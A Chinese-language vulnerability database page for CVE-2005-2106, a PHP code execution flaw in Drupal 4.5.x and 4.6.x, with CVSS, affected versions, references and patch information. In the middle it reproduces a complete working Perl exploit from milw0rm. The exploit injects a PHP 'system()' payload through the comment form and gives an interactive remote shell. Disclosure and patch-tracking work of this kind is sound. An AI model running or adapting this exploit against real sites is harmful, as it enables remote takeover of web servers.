CVE-2005-2106
CVSS5.0
发布时间 :2005-07-05 00:00:00
修订时间 :2016-10-17 23:24:59
NMCOES    

[原文]Unknown vulnerability in Drupal 4.5.0 through 4.5.3, 4.6.0, and 4.6.1 allows remote attackers to execute arbitrary PHP code via a public comment or posting.


[CNNVD]Drupal 未知 PHP代码执行漏洞(CNNVD-200507-003)

        Drupal是一款开源CMS,可以作为各种网站的内容管理平台。
        Drupal 4.5.0至4.5.3、4.6.0及4.6.1版本中存在未知漏洞。
        击者利用此漏洞,通过public comment或posting,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:drupal:drupal:4.5.3
cpe:/a:drupal:drupal:4.5.0
cpe:/a:drupal:drupal:4.5.2
cpe:/a:drupal:drupal:4.6.1
cpe:/a:drupal:drupal:4.5.1
cpe:/a:drupal:drupal:4.6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2106
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2106
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-003
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112015287827452&w=2
(UNKNOWN)  BUGTRAQ  20050629 [DRUPAL-SA-2005-002] Drupal 4.6.2 / 4.5.4 fixes input validation issue
http://www.debian.org/security/2005/dsa-745
(UNKNOWN)  DEBIAN  DSA-745
http://www.drupal.org/security/drupal-sa-2005-002/advisory.txt
(UNKNOWN)  CONFIRM  http://www.drupal.org/security/drupal-sa-2005-002/advisory.txt
http://www.securityfocus.com/bid/14110
(UNKNOWN)  BID  14110

- 漏洞信息

Drupal 未知 PHP代码执行漏洞
中危 输入验证
2005-07-05 00:00:00 2005-10-20 00:00:00
远程  
        Drupal是一款开源CMS,可以作为各种网站的内容管理平台。
        Drupal 4.5.0至4.5.3、4.6.0及4.6.1版本中存在未知漏洞。
        击者利用此漏洞,通过public comment或posting,执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://drupal.org/project/drupal

- 漏洞信息 (1088)

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit (EDBID:1088)
php webapps
2005-07-05 Verified
0 dab
N/A [点击下载]
#!/usr/bin/perl
# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
# 
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want 
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
  'host=s'		     => \$host, 
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'drupal_user=s'      => \$drupal_user,
  'drupal_pass=s'      => \$drupal_pass,
	'debug'         	 => \$debug);

&help unless ($host);

while (1){
    print "druppy461\$ ";
    my $cmd = <STDIN>;
    &druppy($cmd);
}
exit (1); # could be replaced with exit(2)


sub druppy {
    chomp (my $cmd = shift);
    LWP::Debug::level('+') if $debug;

    my $ua = new LWP::UserAgent(
            cookie_jar=> { file => "$$.cookie" });   # this is a random feature
    $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

    if ($drupal_user) { # no need to exploit 
        my ($mhost, $h);
        if ($host =~ /(http:\/\/.*?)\?q=/) {
            $mhost = $1;
            $h = $mhost . "?q=user/login";
        } #some magic hacking here
        else { 
            $host =~ /(.*?)\/.*?\//; $mhost =$1;
            $h = $mhost . "/user/login";
        }
        print $h . "\n" if $debug; 
        my $req = POST $h,[
            'edit[name]' => "$drupal_user",
            'edit[pass]' => "$drupal_pass"
                ]; #grab these, and send to dsr!
        print $req->as_string() if $debug;
        my $res = $ua->request($req);
        print $res->content() if $debug;
        if ($res->is_redirect eq 1) {
            print "Logged\n" if $debug;
        }
    }

    $ua->proxy(['http'] => $proxy) if $proxy;
    my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    my $res = $ua->get("$host");
    my $html = $res->content();
    my @op; # buffer overflow here
    foreach (split(/\n/,$html)) { 
        if ( m/name="op" value="(.*?)"/){
            push(@op,$1);
        }
    }# xss here

    my $ok = 0; # globlal for admin purposes
    foreach my $op (@op) {
        my $req = POST "$host",[
            'edit[subject]' => 'test',
            'edit[comment]' => 
             "<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\");  php?>",
            'edit[format]' => '2',
            'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
            'edit[pid]' => "", # they use it to grab some statistycal information
            'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
            'op' => "$op"
                ];

        print $req->as_string() if $debug;
        my $res = $ua->request($req);
        my $html = $res->content(); 
        print $html if $debug;
        foreach (split(/\n/,$html)) {
            return if $ok gt "1";       # super hack de phrack
            if (/BLAH/) { $ok++; next }
            print "$_\n" if $ok eq "1"; # /n is for another line in screen
        }
    }
}


sub help {
    print "Syntax: ./$0 <url> [options]\n";
    print "\t--drupal_user, --drupal_pass  (needed if dont allow anonymous posts)\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "\nExample\n";
    print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
    print "\n";
    exit(1);
}


#sub 0day_solaris {
# please put your code here
#}

# milw0rm.com [2005-07-05]
		

- 漏洞信息

17647
Drupal Public Comment/Posting Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-06-29 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Drupal Arbitrary PHP Code Execution Vulnerability
Input Validation Error 14110
Yes No
2005-06-30 12:00:00 2009-07-12 04:06:00
Kuba Zygmunt is credited with the discovery of this vulnerability.

- 受影响的程序版本

Drupal Drupal 4.6.1
Drupal Drupal 4.6
Drupal Drupal 4.5.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Debian Linux 3.1
Drupal Drupal 4.5.2
Drupal Drupal 4.5.2
Drupal Drupal 4.5.1
Drupal Drupal 4.5
Drupal Drupal 4.6.2
Drupal Drupal 4.5.4

- 不受影响的程序版本

Drupal Drupal 4.6.2
Drupal Drupal 4.5.4

- 漏洞讨论

Drupal is prone to a vulnerability that permits the execution of arbitrary PHP code. This issue is due to a failure in the application to properly sanitize user-supplied input.

The application's filter mechanism fails to properly sanitize user-supplied input to 'comments' and 'postings'.

The vendor has addressed this issue in Drupal versions 4.6.2 and 4.5.4; earlier versions are reported vulnerable.

- 漏洞利用

No exploit is required.

A proof of concept has been provided by dab &lt;dab@digitalsec.net&gt;.

- 解决方案

The vendor has addressed this issue in Drupal 4.6.2 and 4.5.4.

Debian Linux has relased security advisory DSA 745-1 addressing this issue for drupal. Please see the referenced advisory for details on obtaining and applying the appropriate updates.


Drupal Drupal 4.5

Drupal Drupal 4.5.1

Drupal Drupal 4.5.2

Drupal Drupal 4.5.2

Drupal Drupal 4.5.3

Drupal Drupal 4.6

Drupal Drupal 4.6.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站